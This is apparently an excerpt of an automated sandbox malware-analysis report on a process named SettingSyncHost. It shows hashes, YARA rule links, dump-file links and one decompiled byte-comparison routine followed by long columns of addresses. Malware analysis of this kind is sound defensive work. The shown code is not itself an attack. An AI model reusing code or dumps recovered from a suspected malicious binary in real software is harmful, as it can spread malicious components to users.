                                                                                                                                      • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                                                      • Instruction ID: beb60b39669aba6a77464b6125a967ef0056a81d446d71afda6b034fff629dd2
                                                                                                                                      • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                                                      • Instruction Fuzzy Hash: BFC18E73D1A5B20A8F77462D545923FEEA26E81B8231FC3A1CCD03F68DC626AD05D6D0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003ED7BE, Relevance: .3, Instructions: 327COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLastProcess_free$CurrentFeatureInfoLocalePresentProcessorTerminate
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4283097504-0
                                                                                                                                      • Opcode ID: bbe79f69fcbc6b647e43d5fa92d0113eafe6182dfd73c45af90749bc988c37d1
                                                                                                                                      • Instruction ID: f0ccd06e6e5dcaabc3fba7b30f7335fc4ed795105a42f7fdb36173a6e77976fe
                                                                                                                                      • Opcode Fuzzy Hash: bbe79f69fcbc6b647e43d5fa92d0113eafe6182dfd73c45af90749bc988c37d1
                                                                                                                                      • Instruction Fuzzy Hash: 46B129755007959BDB36AF26CC82BBBB3A8EF44308F15462DE943C66C0EB75E985CB10
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 0039CD35, Relevance: .3, Instructions: 326COMMONCrypto
                                                                                                                                      Download Yara Rule
                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                      			E0039CD35(void* __eax, void* __ecx) {
				void* _t177;
				signed int _t178;
				void* _t181;
				signed char _t186;
				signed char _t187;
				signed char _t188;
				signed char _t190;
				signed char _t191;
				signed int _t197;
				signed int _t263;
				void* _t266;
				void* _t268;
				void* _t270;
				void* _t272;
				void* _t274;
				void* _t276;
				void* _t279;
				void* _t281;
				void* _t283;
				void* _t286;
				void* _t288;
				void* _t290;
				void* _t293;
				void* _t295;
				void* _t297;
				void* _t300;
				void* _t302;
				void* _t304;

				_t181 = __ecx;
				_t177 = __eax;
				if( *((intOrPtr*)(__eax - 0x1c)) ==  *((intOrPtr*)(__ecx - 0x1c))) {
					_t263 = 0;
					L11:
					if(_t263 != 0) {
						goto L1;
					}
					_t186 =  *(_t177 - 0x18);
					if(_t186 ==  *(_t181 - 0x18)) {
						_t263 = 0;
						L22:
						if(_t263 != 0) {
							goto L1;
						}
						_t187 =  *(_t177 - 0x14);
						if(_t187 ==  *(_t181 - 0x14)) {
							_t263 = 0;
							L33:
							if(_t263 != 0) {
								goto L1;
							}
							_t188 =  *(_t177 - 0x10);
							if(_t188 ==  *(_t181 - 0x10)) {
								_t263 = 0;
								L44:
								if(_t263 != 0) {
									goto L1;
								}
								if( *(_t177 - 0xc) ==  *(_t181 - 0xc)) {
									_t263 = 0;
									L55:
									if(_t263 != 0) {
										goto L1;
									}
									_t190 =  *(_t177 - 8);
									if(_t190 ==  *(_t181 - 8)) {
										_t263 = 0;
										L66:
										if(_t263 != 0) {
											goto L1;
										}
										_t191 =  *(_t177 - 4);
										if(_t191 ==  *(_t181 - 4)) {
											_t178 = 0;
											L78:
											if(_t178 == 0) {
												_t178 = 0;
											}
											L80:
											return _t178;
										}
										_t266 = (_t191 & 0x000000ff) - ( *(_t181 - 4) & 0x000000ff);
										if(_t266 == 0) {
											L70:
											_t268 = ( *(_t177 - 3) & 0x000000ff) - ( *(_t181 - 3) & 0x000000ff);
											if(_t268 == 0) {
												L72:
												_t270 = ( *(_t177 - 2) & 0x000000ff) - ( *(_t181 - 2) & 0x000000ff);
												if(_t270 == 0) {
													L75:
													_t178 = ( *(_t177 - 1) & 0x000000ff) - ( *(_t181 - 1) & 0x000000ff);
													if(_t178 != 0) {
														_t176 = (0 | _t178 > 0x00000000) - 1; // -1
														_t178 = (_t178 > 0) + _t176;
													}
													goto L78;
												}
												_t197 = (0 | _t270 > 0x00000000) + (0 | _t270 > 0x00000000) - 1;
												if(_t197 == 0) {
													goto L75;
												}
												L74:
												_t178 = _t197;
												goto L78;
											}
											_t197 = (0 | _t268 > 0x00000000) + (0 | _t268 > 0x00000000) - 1;
											if(_t197 != 0) {
												goto L74;
											}
											goto L72;
										}
										_t197 = (0 | _t266 > 0x00000000) + (0 | _t266 > 0x00000000) - 1;
										if(_t197 != 0) {
											goto L74;
										}
										goto L70;
									}
									_t272 = (_t190 & 0x000000ff) - ( *(_t181 - 8) & 0x000000ff);
									if(_t272 == 0) {
										L59:
										_t274 = ( *(_t177 - 7) & 0x000000ff) - ( *(_t181 - 7) & 0x000000ff);
										if(_t274 == 0) {
											L61:
											_t276 = ( *(_t177 - 6) & 0x000000ff) - ( *(_t181 - 6) & 0x000000ff);
											if(_t276 == 0) {
												L63:
												_t263 = ( *(_t177 - 5) & 0x000000ff) - ( *(_t181 - 5) & 0x000000ff);
												if(_t263 != 0) {
													_t151 = (0 | _t263 > 0x00000000) - 1; // -1
													_t263 = (_t263 > 0) + _t151;
												}
												goto L66;
											}
											_t145 = (0 | _t276 > 0x00000000) - 1; // -1
											_t263 = (_t276 > 0) + _t145;
											if(_t263 != 0) {
												goto L1;
											}
											goto L63;
										}
										_t139 = (0 | _t274 > 0x00000000) - 1; // -1
										_t263 = (_t274 > 0) + _t139;
										if(_t263 != 0) {
											goto L1;
										}
										goto L61;
									}
									_t133 = (0 | _t272 > 0x00000000) - 1; // -1
									_t263 = (_t272 > 0) + _t133;
									if(_t263 != 0) {
										goto L1;
									}
									goto L59;
								}
								_t279 = ( *(_t177 - 0xc) & 0x000000ff) - ( *(_t181 - 0xc) & 0x000000ff);
								if(_t279 == 0) {
									L48:
									_t281 = ( *(_t177 - 0xb) & 0x000000ff) - ( *(_t181 - 0xb) & 0x000000ff);
									if(_t281 == 0) {
										L50:
										_t283 = ( *(_t177 - 0xa) & 0x000000ff) - ( *(_t181 - 0xa) & 0x000000ff);
										if(_t283 == 0) {
											L52:
											_t263 = ( *(_t177 - 9) & 0x000000ff) - ( *(_t181 - 9) & 0x000000ff);
											if(_t263 != 0) {
												_t126 = (0 | _t263 > 0x00000000) - 1; // -1
												_t263 = (_t263 > 0) + _t126;
											}
											goto L55;
										}
										_t120 = (0 | _t283 > 0x00000000) - 1; // -1
										_t263 = (_t283 > 0) + _t120;
										if(_t263 != 0) {
											goto L1;
										}
										goto L52;
									}
									_t114 = (0 | _t281 > 0x00000000) - 1; // -1
									_t263 = (_t281 > 0) + _t114;
									if(_t263 != 0) {
										goto L1;
									}
									goto L50;
								}
								_t108 = (0 | _t279 > 0x00000000) - 1; // -1
								_t263 = (_t279 > 0) + _t108;
								if(_t263 != 0) {
									goto L1;
								}
								goto L48;
							}
							_t286 = (_t188 & 0x000000ff) - ( *(_t181 - 0x10) & 0x000000ff);
							if(_t286 == 0) {
								L37:
								_t288 = ( *(_t177 - 0xf) & 0x000000ff) - ( *(_t181 - 0xf) & 0x000000ff);
								if(_t288 == 0) {
									L39:
									_t290 = ( *(_t177 - 0xe) & 0x000000ff) - ( *(_t181 - 0xe) & 0x000000ff);
									if(_t290 == 0) {
										L41:
										_t263 = ( *(_t177 - 0xd) & 0x000000ff) - ( *(_t181 - 0xd) & 0x000000ff);
										if(_t263 != 0) {
											_t100 = (0 | _t263 > 0x00000000) - 1; // -1
											_t263 = (_t263 > 0) + _t100;
										}
										goto L44;
									}
									_t94 = (0 | _t290 > 0x00000000) - 1; // -1
									_t263 = (_t290 > 0) + _t94;
									if(_t263 != 0) {
										goto L1;
									}
									goto L41;
								}
								_t88 = (0 | _t288 > 0x00000000) - 1; // -1
								_t263 = (_t288 > 0) + _t88;
								if(_t263 != 0) {
									goto L1;
								}
								goto L39;
							}
							_t82 = (0 | _t286 > 0x00000000) - 1; // -1
							_t263 = (_t286 > 0) + _t82;
							if(_t263 != 0) {
								goto L1;
							}
							goto L37;
						}
						_t293 = (_t187 & 0x000000ff) - ( *(_t181 - 0x14) & 0x000000ff);
						if(_t293 == 0) {
							L26:
							_t295 = ( *(_t177 - 0x13) & 0x000000ff) - ( *(_t181 - 0x13) & 0x000000ff);
							if(_t295 == 0) {
								L28:
								_t297 = ( *(_t177 - 0x12) & 0x000000ff) - ( *(_t181 - 0x12) & 0x000000ff);
								if(_t297 == 0) {
									L30:
									_t263 = ( *(_t177 - 0x11) & 0x000000ff) - ( *(_t181 - 0x11) & 0x000000ff);
									if(_t263 != 0) {
										_t75 = (0 | _t263 > 0x00000000) - 1; // -1
										_t263 = (_t263 > 0) + _t75;
									}
									goto L33;
								}
								_t69 = (0 | _t297 > 0x00000000) - 1; // -1
								_t263 = (_t297 > 0) + _t69;
								if(_t263 != 0) {
									goto L1;
								}
								goto L30;
							}
							_t63 = (0 | _t295 > 0x00000000) - 1; // -1
							_t263 = (_t295 > 0) + _t63;
							if(_t263 != 0) {
								goto L1;
							}
							goto L28;
						}
						_t57 = (0 | _t293 > 0x00000000) - 1; // -1
						_t263 = (_t293 > 0) + _t57;
						if(_t263 != 0) {
							goto L1;
						}
						goto L26;
					}
					_t300 = (_t186 & 0x000000ff) - ( *(_t181 - 0x18) & 0x000000ff);
					if(_t300 == 0) {
						L15:
						_t302 = ( *(_t177 - 0x17) & 0x000000ff) - ( *(_t181 - 0x17) & 0x000000ff);
						if(_t302 == 0) {
							L17:
							_t304 = ( *(_t177 - 0x16) & 0x000000ff) - ( *(_t181 - 0x16) & 0x000000ff);
							if(_t304 == 0) {
								L19:
								_t263 = ( *(_t177 - 0x15) & 0x000000ff) - ( *(_t181 - 0x15) & 0x000000ff);
								if(_t263 != 0) {
									_t50 = (0 | _t263 > 0x00000000) - 1; // -1
									_t263 = (_t263 > 0) + _t50;
								}
								goto L22;
							}
							_t44 = (0 | _t304 > 0x00000000) - 1; // -1
							_t263 = (_t304 > 0) + _t44;
							if(_t263 != 0) {
								goto L1;
							}
							goto L19;
						}
						_t38 = (0 | _t302 > 0x00000000) - 1; // -1
						_t263 = (_t302 > 0) + _t38;
						if(_t263 != 0) {
							goto L1;
						}
						goto L17;
					}
					_t32 = (0 | _t300 > 0x00000000) - 1; // -1
					_t263 = (_t300 > 0) + _t32;
					if(_t263 != 0) {
						goto L1;
					}
					goto L15;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1c) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
					if(__esi == 0) {
						L4:
						__esi =  *(__eax - 0x1b) & 0x000000ff;
						__edx =  *(__ecx - 0x1b) & 0x000000ff;
						__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
						if(__esi == 0) {
							L6:
							__esi =  *(__eax - 0x1a) & 0x000000ff;
							__edx =  *(__ecx - 0x1a) & 0x000000ff;
							__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
							if(__esi == 0) {
								L8:
								__esi =  *(__eax - 0x19) & 0x000000ff;
								__edx =  *(__ecx - 0x19) & 0x000000ff;
								__esi = ( *(__eax - 0x19) & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
								if(__esi != 0) {
									__edx = 0;
									_t25 = (0 | __esi > 0x00000000) - 1; // -1
									__esi = (__esi > 0) + _t25;
								}
								goto L11;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t19 = __edx - 1; // -1
							__esi = __edx + _t19;
							if(__edx + _t19 != 0) {
								goto L1;
							}
							goto L8;
						}
						__edx = 0;
						__edx = 0 | __esi > 0x00000000;
						_t13 = __edx - 1; // -1
						__esi = __edx + _t13;
						if(__edx + _t13 != 0) {
							goto L1;
						}
						goto L6;
					}
					__edx = 0;
					__edx = 0 | __esi > 0x00000000;
					_t7 = __edx - 1; // -1
					__esi = __edx + _t7;
					if(__edx + _t7 != 0) {
						goto L1;
					}
					goto L4;
				}
				L1:
				_t178 = _t263;
				goto L80;
			}































                                                                                                                                      0x0039cd35
                                                                                                                                      0x0039cd35
                                                                                                                                      0x0039cd3b
                                                                                                                                      0x0039cda6
                                                                                                                                      0x0039cda8
                                                                                                                                      0x0039cdaa
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039cdac
                                                                                                                                      0x0039cdb2
                                                                                                                                      0x0039ce29
                                                                                                                                      0x0039ce2b
                                                                                                                                      0x0039ce2d
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039ce33
                                                                                                                                      0x0039ce39
                                                                                                                                      0x0039ceb0
                                                                                                                                      0x0039ceb2
                                                                                                                                      0x0039ceb4
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039ceba
                                                                                                                                      0x0039cec0
                                                                                                                                      0x0039cf37
                                                                                                                                      0x0039cf39
                                                                                                                                      0x0039cf3b
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039cf47
                                                                                                                                      0x0039cfbf
                                                                                                                                      0x0039cfc1
                                                                                                                                      0x0039cfc3
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039cfc9
                                                                                                                                      0x0039cfcf
                                                                                                                                      0x0039d046
                                                                                                                                      0x0039d048
                                                                                                                                      0x0039d04a
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d050
                                                                                                                                      0x0039d056
                                                                                                                                      0x0039d0c5
                                                                                                                                      0x0039d0c7
                                                                                                                                      0x0039d0c9
                                                                                                                                      0x0039d0cb
                                                                                                                                      0x0039d0cb
                                                                                                                                      0x0039d0cd
                                                                                                                                      0x0039dd71
                                                                                                                                      0x0039dd71
                                                                                                                                      0x0039d05f
                                                                                                                                      0x0039d061
                                                                                                                                      0x0039d072
                                                                                                                                      0x0039d07a
                                                                                                                                      0x0039d07c
                                                                                                                                      0x0039d08d
                                                                                                                                      0x0039d095
                                                                                                                                      0x0039d097
                                                                                                                                      0x0039d0ac
                                                                                                                                      0x0039d0b4
                                                                                                                                      0x0039d0b6
                                                                                                                                      0x0039d0bf
                                                                                                                                      0x0039d0bf
                                                                                                                                      0x0039d0bf
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d0b6
                                                                                                                                      0x0039d0a0
                                                                                                                                      0x0039d0a6
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d0a8
                                                                                                                                      0x0039d0a8
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d0a8
                                                                                                                                      0x0039d085
                                                                                                                                      0x0039d08b
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d08b
                                                                                                                                      0x0039d06a
                                                                                                                                      0x0039d070
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d070
                                                                                                                                      0x0039cfd8
                                                                                                                                      0x0039cfda
                                                                                                                                      0x0039cfef
                                                                                                                                      0x0039cff7
                                                                                                                                      0x0039cff9
                                                                                                                                      0x0039d00e
                                                                                                                                      0x0039d016
                                                                                                                                      0x0039d018
                                                                                                                                      0x0039d02d
                                                                                                                                      0x0039d035
                                                                                                                                      0x0039d037
                                                                                                                                      0x0039d040
                                                                                                                                      0x0039d040
                                                                                                                                      0x0039d040
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d037
                                                                                                                                      0x0039d021
                                                                                                                                      0x0039d021
                                                                                                                                      0x0039d027
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d027
                                                                                                                                      0x0039d002
                                                                                                                                      0x0039d002
                                                                                                                                      0x0039d008
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d008
                                                                                                                                      0x0039cfe3
                                                                                                                                      0x0039cfe3
                                                                                                                                      0x0039cfe9
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039cfe9
                                                                                                                                      0x0039cf51
                                                                                                                                      0x0039cf53
                                                                                                                                      0x0039cf68
                                                                                                                                      0x0039cf70
                                                                                                                                      0x0039cf72
                                                                                                                                      0x0039cf87
                                                                                                                                      0x0039cf8f
                                                                                                                                      0x0039cf91
                                                                                                                                      0x0039cfa6
                                                                                                                                      0x0039cfae
                                                                                                                                      0x0039cfb0
                                                                                                                                      0x0039cfb9
                                                                                                                                      0x0039cfb9
                                                                                                                                      0x0039cfb9
                                                                                                                                      0x00000000
                                                                                                                                      0x0039cfb0
                                                                                                                                      0x0039cf9a
                                                                                                                                      0x0039cf9a
                                                                                                                                      0x0039cfa0
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039cfa0
                                                                                                                                      0x0039cf7b
                                                                                                                                      0x0039cf7b
                                                                                                                                      0x0039cf81
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039cf81
                                                                                                                                      0x0039cf5c
                                                                                                                                      0x0039cf5c
                                                                                                                                      0x0039cf62
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039cf62
                                                                                                                                      0x0039cec9
                                                                                                                                      0x0039cecb
                                                                                                                                      0x0039cee0
                                                                                                                                      0x0039cee8
                                                                                                                                      0x0039ceea
                                                                                                                                      0x0039ceff
                                                                                                                                      0x0039cf07
                                                                                                                                      0x0039cf09
                                                                                                                                      0x0039cf1e
                                                                                                                                      0x0039cf26
                                                                                                                                      0x0039cf28
                                                                                                                                      0x0039cf31
                                                                                                                                      0x0039cf31
                                                                                                                                      0x0039cf31
                                                                                                                                      0x00000000
                                                                                                                                      0x0039cf28
                                                                                                                                      0x0039cf12
                                                                                                                                      0x0039cf12
                                                                                                                                      0x0039cf18
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039cf18
                                                                                                                                      0x0039cef3
                                                                                                                                      0x0039cef3
                                                                                                                                      0x0039cef9
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039cef9
                                                                                                                                      0x0039ced4
                                                                                                                                      0x0039ced4
                                                                                                                                      0x0039ceda
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039ceda
                                                                                                                                      0x0039ce42
                                                                                                                                      0x0039ce44
                                                                                                                                      0x0039ce59
                                                                                                                                      0x0039ce61
                                                                                                                                      0x0039ce63
                                                                                                                                      0x0039ce78
                                                                                                                                      0x0039ce80
                                                                                                                                      0x0039ce82
                                                                                                                                      0x0039ce97
                                                                                                                                      0x0039ce9f
                                                                                                                                      0x0039cea1
                                                                                                                                      0x0039ceaa
                                                                                                                                      0x0039ceaa
                                                                                                                                      0x0039ceaa
                                                                                                                                      0x00000000
                                                                                                                                      0x0039cea1
                                                                                                                                      0x0039ce8b
                                                                                                                                      0x0039ce8b
                                                                                                                                      0x0039ce91
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039ce91
                                                                                                                                      0x0039ce6c
                                                                                                                                      0x0039ce6c
                                                                                                                                      0x0039ce72
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039ce72
                                                                                                                                      0x0039ce4d
                                                                                                                                      0x0039ce4d
                                                                                                                                      0x0039ce53
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039ce53
                                                                                                                                      0x0039cdbb
                                                                                                                                      0x0039cdbd
                                                                                                                                      0x0039cdd2
                                                                                                                                      0x0039cdda
                                                                                                                                      0x0039cddc
                                                                                                                                      0x0039cdf1
                                                                                                                                      0x0039cdf9
                                                                                                                                      0x0039cdfb
                                                                                                                                      0x0039ce10
                                                                                                                                      0x0039ce18
                                                                                                                                      0x0039ce1a
                                                                                                                                      0x0039ce23
                                                                                                                                      0x0039ce23
                                                                                                                                      0x0039ce23
                                                                                                                                      0x00000000
                                                                                                                                      0x0039ce1a
                                                                                                                                      0x0039ce04
                                                                                                                                      0x0039ce04
                                                                                                                                      0x0039ce0a
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039ce0a
                                                                                                                                      0x0039cde5
                                                                                                                                      0x0039cde5
                                                                                                                                      0x0039cdeb
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039cdeb
                                                                                                                                      0x0039cdc6
                                                                                                                                      0x0039cdc6
                                                                                                                                      0x0039cdcc
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039cd3d
                                                                                                                                      0x0039cd3d
                                                                                                                                      0x0039cd40
                                                                                                                                      0x0039cd44
                                                                                                                                      0x0039cd46
                                                                                                                                      0x0039cd57
                                                                                                                                      0x0039cd57
                                                                                                                                      0x0039cd5b
                                                                                                                                      0x0039cd5f
                                                                                                                                      0x0039cd61
                                                                                                                                      0x0039cd72
                                                                                                                                      0x0039cd72
                                                                                                                                      0x0039cd76
                                                                                                                                      0x0039cd7a
                                                                                                                                      0x0039cd7c
                                                                                                                                      0x0039cd8d
                                                                                                                                      0x0039cd8d
                                                                                                                                      0x0039cd91
                                                                                                                                      0x0039cd95
                                                                                                                                      0x0039cd97
                                                                                                                                      0x0039cd99
                                                                                                                                      0x0039cda0
                                                                                                                                      0x0039cda0
                                                                                                                                      0x0039cda0
                                                                                                                                      0x00000000
                                                                                                                                      0x0039cd97
                                                                                                                                      0x0039cd7e
                                                                                                                                      0x0039cd82
                                                                                                                                      0x0039cd85
                                                                                                                                      0x0039cd85
                                                                                                                                      0x0039cd8b
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039cd8b
                                                                                                                                      0x0039cd63
                                                                                                                                      0x0039cd67
                                                                                                                                      0x0039cd6a
                                                                                                                                      0x0039cd6a
                                                                                                                                      0x0039cd70
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039cd70
                                                                                                                                      0x0039cd48
                                                                                                                                      0x0039cd4c
                                                                                                                                      0x0039cd4f
                                                                                                                                      0x0039cd4f
                                                                                                                                      0x0039cd55
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039cd55
                                                                                                                                      0x0039cd2e
                                                                                                                                      0x0039cd2e
                                                                                                                                      0x00000000

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                                                                                                                                      • Instruction ID: 9955b1e3ff7904f4bf5722f05b36fbaf875af92188bca92a57196e5df5b5f8f1
                                                                                                                                      • Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                                                                                                                                      • Instruction Fuzzy Hash: 6FB19173D2A4B3098F37852D041823FEEA26E91B8131FD3A5DCD03F689C626AD1596D0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003D8570, Relevance: .2, Instructions: 197COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 3a365631c64c82b908384487e1b3a30ea151bd1c5a546b6b93e325d8e6201643
                                                                                                                                      • Instruction ID: 27fe4a9c3f363f7cae70eb913c223ea78ab345c911577d0701f70e19919ef07e
                                                                                                                                      • Opcode Fuzzy Hash: 3a365631c64c82b908384487e1b3a30ea151bd1c5a546b6b93e325d8e6201643
                                                                                                                                      • Instruction Fuzzy Hash: AA619DB2D052599FCB06CFA8E9847EEFBB5AF59310F15422EE901B7341DB71A940CB90
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003D8D40, Relevance: .1, Instructions: 124COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 27398a6bd04e7b042c2df0dd4eefd57469496f7df0cf8f294bdbd0d9e34c2454
                                                                                                                                      • Instruction ID: 09da3143265f5ab02d42d4a80ee5e264c156248898c0148b4ff7e436ff76413a
                                                                                                                                      • Opcode Fuzzy Hash: 27398a6bd04e7b042c2df0dd4eefd57469496f7df0cf8f294bdbd0d9e34c2454
